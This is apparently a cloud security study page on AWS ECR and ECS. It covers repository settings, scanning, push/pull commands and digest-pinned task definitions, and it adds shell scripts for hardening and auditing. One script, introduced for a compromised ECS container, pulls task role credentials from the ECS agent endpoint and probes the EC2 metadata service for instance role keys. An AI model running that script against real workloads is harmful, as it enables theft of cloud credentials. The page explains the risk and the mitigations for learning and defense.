# ECR and ECS

A **registry** is where container images (Docker/OCI) are stored in AWS: every AWS account gets one private ECR registry per region, and the registry is a logical namespace that can contain multiple **repositories.** A **repository** is a collection of related container images within a registry. It stores the different versions (tags) of an image, and it is where one pushes, pulls, and manages the lifecycle of images.

### Steps for using ECR

<figure><img src="https://3681896347-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjfQTFfcSjS8MYnjfKw2c%2Fuploads%2FfLnQCIVVfzv894ZBYrTi%2Fimage.png?alt=media&#x26;token=d24a9225-5357-4be2-a3ff-51c98a6cec23" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3681896347-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjfQTFfcSjS8MYnjfKw2c%2Fuploads%2Fbf2EvK7PAZgRkmKsqdke%2Fimage.png?alt=media&#x26;token=a060938b-e97f-44a4-9ac3-e4b77d58edd1" alt=""><figcaption></figcaption></figure>

* The **URI** is used to reference the repository's images when creating containers on ECS clusters. Format: `<account-id>.dkr.ecr.<region>.amazonaws.com/<repo-name>`. An individual image is referenced as `<uri>:<tag>` or, to pin an exact image, `<uri>@sha256:<digest>`.
* The **Tag immutability** column lists its status. If tag immutability is enabled, a push that reuses an existing tag is rejected (`ImageTagAlreadyExistsException`), so a tag that is already deployed cannot be silently replaced with a different image.
* The **Encryption type** column lists the encryption at rest of the repository: the default `AES256` (keys managed by ECR) or `KMS` (an AWS KMS key, which gives key-usage logging in CloudTrail and lets access be further restricted through the key policy).
* The **Pull through cache** column lists its status. When it is Active, images pulled from a configured upstream public registry are cached into this private repository, so clusters pull from the account's own registry rather than directly from the public one.

<figure><img src="https://3681896347-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjfQTFfcSjS8MYnjfKw2c%2Fuploads%2FR5FXSPVTscKuz0YITkjY%2Fimage.png?alt=media&#x26;token=c5e044d2-7aae-40f9-b384-601bb3671554" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3681896347-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjfQTFfcSjS8MYnjfKw2c%2Fuploads%2FaIQUXE8kSLDAXwsLlXgm%2Fimage.png?alt=media&#x26;token=966562b8-b876-4065-92ef-ebd2b9592d07" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3681896347-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjfQTFfcSjS8MYnjfKw2c%2Fuploads%2F01ITC6bqbuV2e8chqZaS%2Fimage.png?alt=media&#x26;token=0726b33f-c8e5-422b-b3df-8f219ef2078d" alt=""><figcaption></figcaption></figure>

* The **Permissions** section lets you apply a registry policy that grants permissions to an AWS principal at the private registry level. Registry policies scope access to the replication and pull through cache configuration features of the private registry; access to the images themselves is controlled separately, by repository policies and IAM.
* The **Pull through cache configuration** lets you set pull through cache rules (which upstream public registries are cached, and under which repository prefix). The **Replication configuration** lets you set rules to manage cross-region and cross-account repository replication.
* The **Scanning configuration** has two options:
  * **Basic scanning** is free and allows manual scans and scan-on-push of images in the registry; it reports vulnerabilities in the operating system packages of an image.
  * **Enhanced scanning** uses Amazon Inspector for automated, continuous scanning that identifies vulnerabilities in both operating system packages and programming language packages, and re-evaluates images already in the registry when new CVEs are published.
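As an added example that is not part of the original page: the same repository and registry settings driven from the AWS CLI instead of the console, followed by a small audit of the values the repository columns show. It assumes AWS CLI v2 with credentials for the account; the repository name, the KMS key ARN and the tab-separated sample used in the comments are placeholders, and the audit function itself is pure text processing so it can also be run against saved output.

```shell
#!/bin/sh
# Added example (not from the original page). Assumes AWS CLI v2 is configured;
# repository and key names are placeholders.

# Create a repository with immutable tags, scan on push and KMS encryption at rest.
# $1 = repository name, $2 = KMS key ARN/ID (omit to use the AWS managed key for ECR).
ecr_create_hardened_repo() {
  repo="$1"; key="${2:-}"
  if [ -n "$key" ]; then enc="encryptionType=KMS,kmsKey=$key"; else enc="encryptionType=KMS"; fi
  aws ecr create-repository \
    --repository-name "$repo" \
    --image-tag-mutability IMMUTABLE \
    --image-scanning-configuration scanOnPush=true \
    --encryption-configuration "$enc"
}

# Switch the whole registry to enhanced (Amazon Inspector) continuous scanning.
# Requires Amazon Inspector to be enabled for ECR in this account and region.
ecr_enable_enhanced_scanning() {
  aws ecr put-registry-scanning-configuration \
    --scan-type ENHANCED \
    --rules '[{"scanFrequency":"CONTINUOUS_SCAN","repositoryFilters":[{"filter":"*","filterType":"WILDCARD"}]}]'
}

# Dump the settings shown in the console's repository columns as tab-separated text:
# name, tag mutability, scan on push (True/False), encryption type.
ecr_list_repo_settings() {
  aws ecr describe-repositories --output text \
    --query 'repositories[].[repositoryName,imageTagMutability,imageScanningConfiguration.scanOnPush,encryptionConfiguration.encryptionType]'
}

# Read that tab-separated listing on stdin and print one finding per weak setting.
# Constructed sample line: "web<TAB>MUTABLE<TAB>False<TAB>AES256" yields three findings.
ecr_audit_repo_settings() {
  while IFS="$(printf '\t')" read -r name mut scan enc; do
    [ -z "$name" ] && continue
    [ "$mut" = "IMMUTABLE" ] || echo "$name: tags are MUTABLE (a deployed tag can be overwritten)"
    [ "$scan" = "True" ]     || echo "$name: scan on push is disabled"
    [ "$enc" = "KMS" ]       || echo "$name: encrypted with $enc, not a customer-managed KMS key"
  done
}

# Usage: ecr_list_repo_settings | ecr_audit_repo_settings
```

Run the pipeline in the last comment against the account; an empty result means every private repository already matches the hardened settings. Enhanced scanning is a registry-wide switch, which is why it is a separate call from the per-repository creation.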

<figure><img src="https://3681896347-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjfQTFfcSjS8MYnjfKw2c%2Fuploads%2FxJf4FbNJ6hFzFCIABTbH%2Fimage.png?alt=media&#x26;token=5e5535a2-779c-4a14-b907-e2a762aaa22a" alt=""><figcaption></figcaption></figure>

{% hint style="info" %}
The Public tab lists the repositories of this account that are publicly accessible (Amazon ECR Public). A unique default alias is assigned to the public registry at creation; it is the prefix that identifies this account's repositories among the multitude of public repositories on AWS (`public.ecr.aws/<alias>/<repo>`).
{% endhint %}

To push Docker images to ECR:

* **Tag the Docker image** with the repository URI:

  ```bash
  docker tag your-image-name:latest <aws_account_id>.dkr.ecr.<region>.amazonaws.com/your-repository:your-tag
  ```
* **Log in to ECR**: authenticate Docker to your ECR registry. The password is a token that expires after 12 hours, so long-running CI runners must repeat this step:

  ```bash
  aws ecr get-login-password --region <region> | docker login --username AWS --password-stdin <aws_account_id>.dkr.ecr.<region>.amazonaws.com
  ```
* **Push the image**: push the tagged image to ECR (the push fails with `ImageTagAlreadyExistsException` if the tag already exists in a repository with tag immutability enabled):

  ```bash
  docker push <aws_account_id>.dkr.ecr.<region>.amazonaws.com/your-repository:your-tag
  ```
* **Pull the image** (pulling requires the same login):

  ```bash
  docker pull <aws_account_id>.dkr.ecr.<region>.amazonaws.com/your-repository:your-tag
  ```

Example:

<figure><img src="https://3681896347-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjfQTFfcSjS8MYnjfKw2c%2Fuploads%2FtYSO26eI0O2tk1v1aYdF%2Fimage.png?alt=media&#x26;token=35fa5221-da89-441a-9bd5-09e92319294f" alt=""><figcaption></figcaption></figure>

{% hint style="info" %}
Integrate ECR with CI/CD tools (like AWS CodePipeline or Jenkins) to automate the process of building, tagging, and pushing images to ECR whenever changes are made to your codebase.
{% endhint %}

```bash
# After pulling an image, to run it locally:
docker images                                              # lists local images with their IMAGE ID
docker run -it -p <host-port>:<container-port> <ImageID>   # runs the image, mapping a host port to the container port
docker ps                                                  # shows the running container's ID and name
docker exec -it <container_id_or_name> bash                # opens a shell inside the running container
```

* Implement a tagging strategy that includes version numbers and identifiers for easy tracking and updates. When creating new versions of the application, use a consistent scheme (such as semantic versioning) so that tags clearly indicate changes (e.g., `v1.0.0`, `v1.1.0`). Unless tag immutability is enabled, a tag is a mutable pointer; the image digest (`sha256:...`) is the only identifier that cannot change.
* After pushing new images, update the deployment configuration in ECS or EKS to use the new tag. In ECS this is done through the Task Definition, which specifies the container image with a particular tag (or digest). The tag can be injected from an environment variable or pipeline parameter so that the same definition template is reused for every version.
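The push procedure above and this tagging/deployment step, carried through end to end as an added example (not code from the original page): tag and push the image, capture the digest that `docker push` prints, and register an ECS task definition pinned to `<uri>@sha256:<digest>` rather than to a tag that could later be overwritten. It assumes AWS CLI v2 and Docker; the account id, region, repository, family, role ARNs, container port and the constructed `docker push` output line are placeholders.

```shell
#!/bin/sh
# Added example (not from the original page). Assumes AWS CLI v2 and Docker;
# account id, region, repository, family and role names are placeholders.

# Build the full image reference; the account id must be 12 digits.
ecr_image_uri() {
  account="$1"; region="$2"; repo="$3"; tag="$4"
  case "$account" in
    [0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9]) ;;
    *) echo "bad account id: $account" >&2; return 1 ;;
  esac
  echo "$account.dkr.ecr.$region.amazonaws.com/$repo:$tag"
}

# Docker login with a short-lived (12 h) ECR token. $1 = account id, $2 = region.
ecr_login() {
  aws ecr get-login-password --region "$2" |
    docker login --username AWS --password-stdin "$1.dkr.ecr.$2.amazonaws.com"
}

# Extract the sha256 digest from `docker push` output, whose last line looks like
# "v1.0.0: digest: sha256:<64 hex> size: 1572". Fails if no digest line is present.
digest_from_push_output() {
  d="$(sed -n 's/.*digest: \(sha256:[0-9a-f]\{64\}\).*/\1/p' | tail -n 1)"
  [ -n "$d" ] || return 1
  echo "$d"
}

# True only for a digest-pinned reference (<uri>@sha256:...).
image_is_pinned() {
  case "$1" in *@sha256:[0-9a-f]*) return 0 ;; *) return 1 ;; esac
}

# Tag, push and print the digest-pinned reference. $1..$4 as for ecr_image_uri,
# $5 = local image (e.g. myapp:latest). The pinned reference keeps pointing at this
# exact image even if the tag is later overwritten in a repository with mutable tags.
ecr_push_pinned() {
  uri="$(ecr_image_uri "$1" "$2" "$3" "$4")" || return 1
  docker tag "$5" "$uri"
  digest="$(docker push "$uri" | digest_from_push_output)" || return 1
  echo "${uri%:*}@$digest"
}

# Register a minimal Fargate task definition whose container image is the pinned
# reference. $1 = image, $2 = family, $3 = task role ARN, $4 = execution role ARN
# (the execution role is what lets ECS pull from the private registry).
ecs_register_pinned_taskdef() {
  image="$1"; family="$2"; task_role="$3"; exec_role="$4"
  image_is_pinned "$image" || { echo "refusing unpinned image: $image" >&2; return 1; }
  aws ecs register-task-definition --cli-input-json "$(cat <<EOF
{
  "family": "$family",
  "networkMode": "awsvpc",
  "requiresCompatibilities": ["FARGATE"],
  "cpu": "256",
  "memory": "512",
  "taskRoleArn": "$task_role",
  "executionRoleArn": "$exec_role",
  "containerDefinitions": [{
    "name": "app",
    "image": "$image",
    "essential": true,
    "readonlyRootFilesystem": true,
    "portMappings": [{"containerPort": 8080, "protocol": "tcp"}]
  }]
}
EOF
)" --query 'taskDefinition.taskDefinitionArn' --output text
}

# Usage: ./push.sh 123456789012 us-east-1 myapp v1.0.0 myapp:latest
if [ "$#" -eq 5 ]; then
  ecr_login "$1" "$2"
  pinned="$(ecr_push_pinned "$1" "$2" "$3" "$4" "$5")"
  echo "pushed $pinned"
  ecs_register_pinned_taskdef "$pinned" "$3" \
    "arn:aws:iam::$1:role/${3}-task-role" "arn:aws:iam::$1:role/ecsTaskExecutionRole"
fi
```

The tag still carries the human-readable version for tracking, but the task definition revision records the digest, so what the cluster runs is exactly what was scanned and pushed; `ecs_register_pinned_taskdef` refuses a tag-only reference for that reason.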

**ECS** (Elastic Container Service) runs containers as tasks on a cluster, which is a logical grouping of capacity (EC2 instances you register, or serverless Fargate capacity); ECS schedules the tasks, so you run an application without having to scale your own cluster management infrastructure. If you manage to compromise a service running in **ECS**, the **metadata endpoints change**: instead of the EC2 instance metadata service at `169.254.169.254`, the task's IAM role credentials are served by the ECS agent at `http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`, and task metadata at `$ECS_CONTAINER_METADATA_URI_V4`, both read from the container's environment. On the EC2 launch type the instance metadata service may additionally be reachable from inside the container, which exposes the instance role on top of the task role; this is why the task role should be minimally privileged and why IMDS access from tasks should be blocked (for example with `ECS_AWSVPC_BLOCK_IMDS=true` in the agent configuration for awsvpc tasks).
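The endpoint change described above, as an added example that is not part of the original page: from inside a compromised container, derive the credential and metadata URLs from the environment the ECS agent injects, fetch the task role credentials, and probe whether the instance metadata service is reachable as well. It assumes only `curl` and the standard ECS/EC2 environment variables; the environment values used in the comments are constructed.

```shell
#!/bin/sh
# Added example (not from the original page). Assumes curl; the link-local addresses
# are the documented ECS agent and EC2 IMDS endpoints.

ECS_CREDS_HOST="169.254.170.2"     # ECS agent credential and task metadata endpoint
EC2_IMDS_HOST="169.254.169.254"    # EC2 instance metadata service

# Print the URL that serves AWS credentials for the current container:
#  - ECS task role:  AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/<uuid>
#  - other container identity providers set AWS_CONTAINER_CREDENTIALS_FULL_URI
# Returns 1 when neither is set, which is how a task without a task role looks.
credentials_url() {
  if [ -n "${AWS_CONTAINER_CREDENTIALS_RELATIVE_URI:-}" ]; then
    echo "http://$ECS_CREDS_HOST$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
  elif [ -n "${AWS_CONTAINER_CREDENTIALS_FULL_URI:-}" ]; then
    echo "$AWS_CONTAINER_CREDENTIALS_FULL_URI"
  else
    return 1
  fi
}

# Task metadata v4 (cluster, task ARN, container names, network) lives under
# ECS_CONTAINER_METADATA_URI_V4, e.g. http://169.254.170.2/v4/<id>; /task is the task view.
task_metadata_url() {
  [ -n "${ECS_CONTAINER_METADATA_URI_V4:-}" ] || return 1
  echo "${ECS_CONTAINER_METADATA_URI_V4}/task"
}

# Fetch the task role credentials (JSON with AccessKeyId, SecretAccessKey, Token,
# Expiration). No token or special header is required, which is why code execution
# or SSRF inside the container is enough to obtain them.
dump_task_credentials() {
  url="$(credentials_url)" || { echo "no container credential endpoint in env" >&2; return 1; }
  curl -sS -m 2 "$url"
}

# Check whether the EC2 instance role is also reachable from the task (EC2 launch
# type without ECS_AWSVPC_BLOCK_IMDS or a restrictive IMDS hop limit). Uses IMDSv2.
probe_instance_role() {
  token="$(curl -sS -m 2 -X PUT "http://$EC2_IMDS_HOST/latest/api/token" \
           -H "X-aws-ec2-metadata-token-ttl-seconds: 300")" || return 1
  curl -sS -m 2 -H "X-aws-ec2-metadata-token: $token" \
    "http://$EC2_IMDS_HOST/latest/meta-data/iam/security-credentials/"
}

# Usage inside a container: sh ecs-creds.sh run
if [ "${1:-}" = "run" ]; then
  echo "task metadata: $(task_metadata_url || echo none)"
  dump_task_credentials
  probe_instance_role || echo "instance metadata not reachable from this task"
fi
```

Credentials obtained this way are the task role's temporary keys and expire at `Expiration`; a `probe_instance_role` call that returns a role name means the container can also reach the instance role, which is the misconfiguration to fix before worrying about the task role's permissions.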

<-Will update later, so ignore the below->

Deploy Images Using Tags in ECS or EKS //Give snapshot images below for the steps

* When creating or updating an ECS Task Definition or an EKS Deployment, specify the image URI with the tag:
  * Example: `<aws_account_id>.dkr.ecr.<region>.amazonaws.com/nameof-repository:tag-given` (or `...@sha256:<digest>` to pin the exact image).
* For ECS, this is done in the Task Definition:
  * Go to **ECS** in the console.
  * Select **Task Definitions** and either create a new one or edit an existing definition (task definitions are versioned, so editing registers a new revision).
  * Under **Container Definitions**, specify the image URI with the tag.
